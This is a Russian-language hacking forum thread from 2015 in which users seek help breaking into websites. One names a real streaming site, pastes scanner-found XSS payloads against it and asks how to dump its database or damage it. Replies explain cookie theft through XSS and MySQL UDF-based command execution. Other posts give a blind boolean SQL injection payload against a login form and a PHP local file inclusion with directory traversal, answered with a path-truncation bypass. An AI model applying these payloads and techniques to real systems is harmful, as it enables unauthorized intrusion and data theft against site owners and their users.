ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

13.08.2015, 12:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 4864
Репутация:
0
|
|
Сообщение от Sensoft
Sensoft said:
↑
ребят вот нашёл сайт, и перейдя по правельной ссылки мне выдаёт файл config и там настройки подключения к бд
DATABASE HOSTNAME - есть
DATABASE USERNAME - есть
DATABASE PASSWORD - есть
DATABASE NAME - есть
DATABASE PORT - есть
И ещё асякие конфигурации там вроде даже есть привязка по IP адресам
Так вот в чём вопрос это считается серьёзной уязвимостью ? (если да то на сколько она серьёзная)
А какая СУБД?
Если MySQL, например, то не забудь про UDF функции, при помощи которых можно замутить RCE от имени пользователя СУБД на уровне ОС.
|
|
|
|

13.08.2015, 16:07
|
|
Guest
Сообщений: n/a
Провел на форуме: 104689
Репутация:
1
|
|
|
|
|
|

13.08.2015, 17:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 56887
Репутация:
28
|
|
'nj
Сообщение от Sensoft
Sensoft said:
↑
В общем вот сайт
http://www.tvzavr.ru/
Netsparker показывает уязвимости Netsparker
Cookie Not Marked as Secure
Cross-site Scripting -
.SpoilerTarget" type="button">Spoiler: Отчёт
Url http://www.tvzavr.ru/filmy?sort='"-->netsparker(0x00052A)
.SpoilerTarget" type="button">Spoiler: Отчёт
Parameter Name sort
Parameter Type GET
Attack Pattern '"-->netsparker(0x00052A)
Можно как нибудь слить BD или накасячить на сайте ?
это означает что куки не имеют флага http-only, что означает возможность угона, в том числе авторизационной куки, если такая есть там, в случае наличия XSS уязвимости, с помощью JS скрипта.
Надеюсь достаточно полно получилось объяснить, если нет. прошу коллег подправить.
Что, захотелось себе на телевизор каналов бесплатно? не советую, так себе сервис и каналы не очень Это относительно самого сообщения.
То что под спойлером, похоже на указание наличия XSS, судя по всему отраженному.
|
|
|
|

13.08.2015, 17:36
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от Sensoft
Sensoft said:
↑
В общем вот сайт
http://www.tvzavr.ru/
Netsparker показывает уязвимости Netsparker
Cookie Not Marked as Secure
Cross-site Scripting -
.SpoilerTarget" type="button">Spoiler: Отчёт
Url http://www.tvzavr.ru/filmy?sort='"-->netsparker(0x00052A)
.SpoilerTarget" type="button">Spoiler: Отчёт
Parameter Name sort
Parameter Type GET
Attack Pattern '"-->netsparker(0x00052A)
Можно как нибудь слить BD или накасячить на сайте ?
для начала стоит прочитать что это за уязвимость и что позволяет сделать
|
|
|

14.08.2015, 04:02
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме: 1180165
Репутация:
11
|
|
есть blind boolean based sql inj в поле авторизации
база - Microsoft SQL Server 2008 R2 (SP1) - 10.50.2500.0
название базы достает, таблицы, колонки достает, а данные не хочет.
Помогите составить запрос.
' or ASCII(CAST(SUBSTRING((SELECT TOP 1 Login FROM Users),1,1) AS VARCHAR(8000)))>1-- ->false =не работает
Как достать данные?
Спасибо.
|
|
|

14.08.2015, 04:07
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме: 1180165
Репутация:
11
|
|
Сообщение от wkar
wkar said:
↑
есть blind boolean based sql inj в поле авторизации
база - Microsoft SQL Server 2008 R2 (SP1) - 10.50.2500.0
название базы достает, таблицы, колонки достает, а данные не хочет.
Помогите составить запрос.
' or ASCII(CAST(SUBSTRING((SELECT TOP 1 Login FROM Users),1,1) AS VARCHAR(8000)))>1-- ->false =не работает
Как достать данные?
Спасибо.
Походу колонка логин пуста о_О, потому что
ASCII(CAST(SUBSTRING((SELECT TOP 1 customer_type FROM Users),1,1) AS VARCHAR(8000)))>1-- -> TRUE
И там там только одна запись
Почему с остальных колонок не достает инфу ?
|
|
|

14.08.2015, 11:21
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
|
|
|
|

14.08.2015, 11:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
|
|
|
|

15.08.2015, 07:34
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме: 355954
Репутация:
32
|
|
Есть код подруба языка
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]include([/COLOR][COLOR="#DD0000"]'languages/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'/index.php'[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
По дерикториям прыгать получается ?lang=en/../../ - такой запрос инклудит индексный файл в корне сайта), нулёвый байт не прокатит из за версии php
Может есть какие-то идейки?)
|
|
|

15.08.2015, 12:17
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
ну как бы альтернатива нульбайта из /././././[4096]./.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|